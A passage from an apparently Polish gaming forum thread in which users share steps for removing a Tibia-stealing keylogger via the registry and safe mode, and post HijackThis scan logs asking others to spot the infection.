Po prawej stronie odnajdujemy nazwę wartośći 'SysCtrl'. Jeżeli jej nie ma, to znaczy, że nie masz keya Lord of Tibia na swoim komputerze. Zapisz sobie ścieżkę do pliku, która pisze na prawo od nazwy wartości. Nie usuwaj jej! Nic to nie da, keylogger w ciągu parenastu sekund ją przywróci.
Teraz uruchamiamy komputer w trybie awaryjnym (podczas włączania komputera naciskajcie F8 aż pojawi się okienko wyboru trybów). Zależnie od wersji keyloggera, będziesz miał zapisane na kartce samą nazwę pliku, lub ścieżkę do niego. W 2-gim przypadku poprostu usuń ten plik. W 1-szym natomiast przejdź do katalogu C:\Windows\system32\drivers\etc, a w przypadku systemu z rodziny NT C:\Winnt\system32\drivers\etc i usuń plik o nazwie którą odczytałeś wcześniej.
Teraz uruchom komputer normalnie, przejdź do wspomnianego wcześniej klucza w rejestrze, usuń wartość 'SysCtrl' i gotowe!

nic takiego nie znalazlem i postwowilem sobie uoprnic otwiram a tam ich
IP wygladalo to mw tak:

127.0.0.1 costamhost

postwilem usnoc czy dobrze zrobilme?

Problem z owntibią?lord of tibią?tibia logger? tibia mail? Findit! i Hijack this
Cię uratują.

no chyba Ci nie działa ten link który podałes zeby ściągnąć -.- X(

Chciałem się zabespieczyć na przyszłość ,ale nie mam folderu (Windows) w C !

Witam mam key loggera skanowalem system wszystkimi skanerami i nic.
Tu jest moj log z Hijack This zobaczcie czy jest jakis syf.
Wlazilem na hijackthis.de i nic nie wykrylo ;/ moze wy cos zobaczycie prosze o odp i pomoc z gory dzieki :)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:29:33, on 2008-05-06
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss*****
C:\WINDOWS\system32\winlogon*****
C:\WINDOWS\system32\services*****
C:\WINDOWS\system32\lsass*****
C:\WINDOWS\system32\svchost*****
C:\WINDOWS\System32\svchost*****
C:\WINDOWS\system32\spoolsv*****
C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv*****
C:\WINDOWS\eHome\ehRecvr*****
C:\WINDOWS\eHome\ehSched*****
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn*****
C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
C:\WINDOWS\system32\nvsvc32*****
C:\WINDOWS\system32\PnkBstrA*****
C:\WINDOWS\system32\svchost*****
C:\WINDOWS\system32\dllhost*****
C:\WINDOWS\System32\svchost*****
C:\WINDOWS\Explorer*****
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
C:\WINDOWS\ehome\ehtray*****
C:\WINDOWS\system32\RUNDLL32*****
C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
C:\WINDOWS\eHome\ehmsas*****
C:\Program Files\ESET\ESET NOD32 Antivirus\egui*****
C:\Program Files\Common Files\Real\Update_OB\realsched*****
C:\Program Files\Logitech\QuickCam\Quickcam*****
C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper*****
C:\Program Files\HP\HP Software Update\HPWuSchd2*****
C:\WINDOWS\system32\ctfmon*****
C:\Program Files\AutoConnect\AutoConnect*****
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNo tifier*****
C:\progra~1\valve\steam\steam*****
C:\Program Files\Spybot - Search & Destroy\TeaTimer*****
C:\Program Files\SAGEM\SAGEM F@st 800-840\dslmon*****
C:\Program Files\HP\Digital Imaging\bin\hpqtra08*****
c:\Program Files\HP\Digital Imaging\bin\hpqSTE08*****
C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager*****
c:\Program Files\HP\Digital Imaging\Product Assistant\bin\hprblog*****
C:\Program Files\Gadu-Gadu\gg*****
C:\Program Files\Opera\Opera*****
C:\Program Files\Messenger\msmsgs*****
C:\Program Files\Trend Micro\HijackThis\HijackThis*****
C:\WINDOWS\system32\rundll32*****

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.pl/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vobis.pl/
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\s wg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray*****
O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut] HDAShCut*****
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32***** C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz***** /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32***** C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck*****
O4 - HKLM\..\Run: [Symantec PIF AlertEng] "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****" /a /m "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\AlertEng.dll"
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui*****" /hide /waitservice
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched*****" -osboot
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl*****"
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa*****"
O4 - HKLM\..\Run: [LogitechQuickCamRibbon] "C:\Program Files\Logitech\QuickCam\Quickcam*****" /hide
O4 - HKLM\..\Run: [LogitechCommunicationsManager] "C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper*****"
O4 - HKLM\..\Run: [HP Software Update] c:\Program Files\HP\HP Software Update\HPWuSchd2*****
O4 - HKLM\..\Run: [BootSkin Startup Jobs] "C:\PROGRA~1\Stardock\WinCustomize\BootSkin\BootSki n*****" /StartupJobs
O4 - HKLM\..\Run: [LogonStudio] "C:\Program Files\WinCustomize\LogonStudio\logonstudio*****" /RANDOM
O4 - HKCU\..\Run: [CTFMON*****] C:\WINDOWS\system32\ctfmon*****
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs*****" /background
O4 - HKCU\..\Run: [AutoConnect] C:\Program Files\AutoConnect\AutoConnect*****
O4 - HKCU\..\Run: [Gadu-Gadu] "C:\Program Files\Gadu-Gadu\gg*****" /tray
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNo tifier*****
O4 - HKCU\..\Run: [Steam] "c:\progra~1\valve\steam\steam*****" -silent
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer*****
O4 - HKUS\S-1-5-19\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'USŁUGA LOKALNA')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'USŁUGA SIECIOWA')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'Default user')
O4 - Global Startup: DSLMON.lnk = C:\Program Files\SAGEM\SAGEM F@st 800-840\dslmon*****
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08*****
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Badanie - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\Microsoft Office\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs*****
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs*****
O14 - IERESET.INF: START_PAGE_URL=http://www.vobis.pl/
O17 - HKLM\System\CCS\Services\Tcpip\..\{C1337655-B240-4D13-BAED-BAA35B5591B6}: NameServer = 194.204.159.1 217.98.63.164
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\Skype4COM.dll
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst***** (file missing)
O23 - Service: Eset HTTP Server (EhttpSrv) - Unknown owner - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv*****
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn*****
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService*****
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT*****
O23 - Service: LiveUpdate Notice Service Ex (LiveUpdate Notice Ex) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst***** (file missing)
O23 - Service: LiveUpdate Notice Service - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
O23 - Service: LVCOMSer - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv*****
O23 - Service: LVSrvLauncher - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\SrvLnch\SrvLnch*****
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32*****
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12*****
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA*****

--
End of file - 9028 bytes

Witam
Mam keyloggera skanowalem system przez wszystkie antyviry i nic.
Daje wam moj Log z HijackThis moze wy cos poradzicie na to i usune wrescie ten syf
Skanowalem juz Log na www.HijackThis.de i nic mi nie wykrylo
Tu jest moj Log mam nadzieje ze cos poradzicie z gory dzienx :D

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:29:33, on 2008-05-06
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss*****
C:\WINDOWS\system32\winlogon*****
C:\WINDOWS\system32\services*****
C:\WINDOWS\system32\lsass*****
C:\WINDOWS\system32\svchost*****
C:\WINDOWS\System32\svchost*****
C:\WINDOWS\system32\spoolsv*****
C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv*****
C:\WINDOWS\eHome\ehRecvr*****
C:\WINDOWS\eHome\ehSched*****
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn*****
C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
C:\WINDOWS\system32\nvsvc32*****
C:\WINDOWS\system32\PnkBstrA*****
C:\WINDOWS\system32\svchost*****
C:\WINDOWS\system32\dllhost*****
C:\WINDOWS\System32\svchost*****
C:\WINDOWS\Explorer*****
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
C:\WINDOWS\ehome\ehtray*****
C:\WINDOWS\system32\RUNDLL32*****
C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
C:\WINDOWS\eHome\ehmsas*****
C:\Program Files\ESET\ESET NOD32 Antivirus\egui*****
C:\Program Files\Common Files\Real\Update_OB\realsched*****
C:\Program Files\Logitech\QuickCam\Quickcam*****
C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper*****
C:\Program Files\HP\HP Software Update\HPWuSchd2*****
C:\WINDOWS\system32\ctfmon*****
C:\Program Files\AutoConnect\AutoConnect*****
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNo tifier*****
C:\progra~1\valve\steam\steam*****
C:\Program Files\Spybot - Search & Destroy\TeaTimer*****
C:\Program Files\SAGEM\SAGEM F@st 800-840\dslmon*****
C:\Program Files\HP\Digital Imaging\bin\hpqtra08*****
c:\Program Files\HP\Digital Imaging\bin\hpqSTE08*****
C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager*****
c:\Program Files\HP\Digital Imaging\Product Assistant\bin\hprblog*****
C:\Program Files\Gadu-Gadu\gg*****
C:\Program Files\Opera\Opera*****
C:\Program Files\Messenger\msmsgs*****
C:\Program Files\Trend Micro\HijackThis\HijackThis*****
C:\WINDOWS\system32\rundll32*****

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.pl/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vobis.pl/
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\s wg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray*****
O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut] HDAShCut*****
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32***** C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz***** /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32***** C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck*****
O4 - HKLM\..\Run: [Symantec PIF AlertEng] "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****" /a /m "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\AlertEng.dll"
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui*****" /hide /waitservice
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched*****" -osboot
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl*****"
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa*****"
O4 - HKLM\..\Run: [LogitechQuickCamRibbon] "C:\Program Files\Logitech\QuickCam\Quickcam*****" /hide
O4 - HKLM\..\Run: [LogitechCommunicationsManager] "C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper*****"
O4 - HKLM\..\Run: [HP Software Update] c:\Program Files\HP\HP Software Update\HPWuSchd2*****
O4 - HKLM\..\Run: [BootSkin Startup Jobs] "C:\PROGRA~1\Stardock\WinCustomize\BootSkin\BootSki n*****" /StartupJobs
O4 - HKLM\..\Run: [LogonStudio] "C:\Program Files\WinCustomize\LogonStudio\logonstudio*****" /RANDOM
O4 - HKCU\..\Run: [CTFMON*****] C:\WINDOWS\system32\ctfmon*****
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs*****" /background
O4 - HKCU\..\Run: [AutoConnect] C:\Program Files\AutoConnect\AutoConnect*****
O4 - HKCU\..\Run: [Gadu-Gadu] "C:\Program Files\Gadu-Gadu\gg*****" /tray
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNo tifier*****
O4 - HKCU\..\Run: [Steam] "c:\progra~1\valve\steam\steam*****" -silent
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer*****
O4 - HKUS\S-1-5-19\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'USŁUGA LOKALNA')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'USŁUGA SIECIOWA')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON*****] C:\WINDOWS\system32\CTFMON***** (User 'Default user')
O4 - Global Startup: DSLMON.lnk = C:\Program Files\SAGEM\SAGEM F@st 800-840\dslmon*****
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08*****
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Badanie - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\Microsoft Office\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs*****
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs*****
O14 - IERESET.INF: START_PAGE_URL=http://www.vobis.pl/
O17 - HKLM\System\CCS\Services\Tcpip\..\{C1337655-B240-4D13-BAED-BAA35B5591B6}: NameServer = 194.204.159.1 217.98.63.164
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\Skype4COM.dll
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst***** (file missing)
O23 - Service: Eset HTTP Server (EhttpSrv) - Unknown owner - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv*****
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn*****
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService*****
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT*****
O23 - Service: LiveUpdate Notice Service Ex (LiveUpdate Notice Ex) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst***** (file missing)
O23 - Service: LiveUpdate Notice Service - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
O23 - Service: LVCOMSer - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv*****
O23 - Service: LVSrvLauncher - Logitech Inc. - C:\Program Files\Common Files\LogiShrd\SrvLnch\SrvLnch*****
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32*****
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12*****
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA*****

--
End of file - 9028 bytes

Witam
Mam keyloggera i zostalem wczoraj hakniety
Skanowalem Dysk wszystkimi virami jakie mozliwe i nic nie wykrylo
Robilem rowniez skan z HijackThis i dalem na strone HijackThis.de i nic mi nie wykrylo
Moze wy cos poradzicie na tego keya i wrescie usune ten syf
Tu podaje Loga z HijackThis mam nadzieje ze cos nam sie uda z gory Dzienx :D

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:32:45, on 2008-05-07
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss*****
C:\WINDOWS\system32\winlogon*****
C:\WINDOWS\system32\services*****
C:\WINDOWS\system32\lsass*****
C:\WINDOWS\system32\svchost*****
C:\WINDOWS\System32\svchost*****
C:\WINDOWS\system32\spoolsv*****
C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv*****
C:\WINDOWS\eHome\ehRecvr*****
C:\WINDOWS\eHome\ehSched*****
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn*****
C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
C:\WINDOWS\system32\nvsvc32*****
C:\WINDOWS\system32\HPZipm12*****
C:\WINDOWS\system32\PnkBstrA*****
C:\WINDOWS\system32\svchost*****
C:\WINDOWS\system32\dllhost*****
C:\WINDOWS\System32\svchost*****
C:\WINDOWS\Explorer*****
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer*****
C:\WINDOWS\ehome\ehtray*****
C:\WINDOWS\system32\RUNDLL32*****
C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****
C:\Program Files\ESET\ESET NOD32 Antivirus\egui*****
C:\Program Files\Common Files\Real\Update_OB\realsched*****
C:\WINDOWS\eHome\ehmsas*****
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl*****
C:\Program Files\Logitech\QuickCam\Quickcam*****
C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper*****
C:\Program Files\HP\HP Software Update\HPWuSchd2*****
C:\WINDOWS\system32\ctfmon*****
C:\Program Files\Messenger\msmsgs*****
C:\Program Files\AutoConnect\AutoConnect*****
C:\Program Files\Gadu-Gadu\gg*****
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNo tifier*****
C:\WINDOWS\system32\wuauclt*****
C:\progra~1\valve\steam\steam*****
C:\Program Files\Spybot - Search & Destroy\TeaTimer*****
C:\Program Files\SAGEM\SAGEM F@st 800-840\dslmon*****
C:\Program Files\HP\Digital Imaging\bin\hpqtra08*****
C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager*****
c:\Program Files\HP\Digital Imaging\bin\hpqSTE08*****
C:\Program Files\Opera\Opera*****
c:\Program Files\HP\Digital Imaging\Product Assistant\bin\hprblog*****
C:\Program Files\Trend Micro\HijackThis\HijackThis*****

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.pl/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vobis.pl/
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\s wg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray*****
O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut] HDAShCut*****
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32***** C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz***** /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32***** C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck*****
O4 - HKLM\..\Run: [Symantec PIF AlertEng] "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc*****" /a /m "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\AlertEng.dll"
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui*****" /hide /waitservice
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched*****" -osboot
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl*****"
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa*****"
O4 - HKLM\..\Run: [LogitechQuickCamRibbon] "C:\Program Files\Logitech\QuickCam\Quickcam*****" /hide
O4 - HKLM\..\Run: [LogitechCommunicationsManager] "C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper*****"
O4 - HKLM\..\Run: [HP Software Update] c:\Program Files\HP\HP Software Update\HPWuSchd2*****
O4 - HKLM\..\Run: [BootSkin Startup Jobs] "C:\PROGRA~1\Stardock\WinCustomize\BootSkin\BootSki n*****" /StartupJobs
O4 - HKLM\..\Run: [LogonStudio] "C:\Program Files\WinCustomize\LogonStudio\logonstudio*****" /RANDOM
O4 - HKCU\..\Run: [CTFMON*****] C:\WINDOWS\system32\ctfmon*****
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs*****" /background
